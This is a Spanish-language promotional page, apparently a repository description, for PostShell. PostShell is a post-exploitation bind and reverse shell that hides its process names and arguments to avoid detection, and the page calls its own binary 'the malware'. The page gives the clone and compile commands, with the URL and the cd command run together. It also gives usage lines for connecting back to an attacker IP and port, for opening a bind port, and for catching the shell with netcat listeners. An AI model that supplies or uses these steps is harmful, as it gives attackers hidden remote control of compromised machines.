
PostShell - Shell de enlace/conexión inversa para post-explotación
PostShell es un shell de post-explotación que incluye tanto un shell bind como un shell de conexión inversa. Crea un TTY completamente interactivo que permite el control de trabajos. El tamaño del stub es de aproximadamente 14 kb y se puede compilar en cualquier sistema similar a Unix.
Banner e interacción con el shell después de iniciar una conexión.
PostShell permite una post-explotación más fácil al hacer que el atacante dependa menos de dependencias como Python y Perl. También incorpora tanto un shell de conexión inversa como un shell bind, lo que significa que si un objetivo no permite conexiones salientes, un operador puede simplemente iniciar un shell bind y conectarse a la máquina de forma remota. PostShell es también significativamente menos sospechoso que un shell tradicional debido a que tanto el nombre de los procesos como los argumentos están ocultos.
git clone https://github.com/rek7/postshellcd postshell && sh compile.sh
Esto debería crear un binario llamado "stub", que es el malware.$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$
Conexión inversa:
$ ./stub 127.0.0.1 13377
Shell Bind:
$ ./stub 13377
Recibiendo una conexión inversa:
$ nc -vlp port
Conectando a un shell bind:
$ nc host port